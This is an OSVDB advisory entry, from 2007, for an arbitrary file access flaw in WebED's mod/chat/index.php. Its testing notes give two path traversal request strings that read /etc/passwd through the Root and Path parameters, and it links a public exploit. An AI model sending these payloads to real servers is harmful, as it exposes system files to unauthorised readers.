WebED mod/chat/index.php Multiple Variable Traversal Arbitrary File Access

2007-11-29T00:00:00
ID OSVDB:39699
Type osvdb
Reporter OSVDB
Modified 2007-11-29T00:00:00

Description

Manual Testing Notes

/mod/chat/index.php?Root=../../../../../../etc/passwd /mod/chat/index.php?Path=../../../../../../etc/passwd

References:

Generic Exploit URL: http://www.milw0rm.com/exploits/4677 CVE-2007-6213 Bugtraq ID: 26640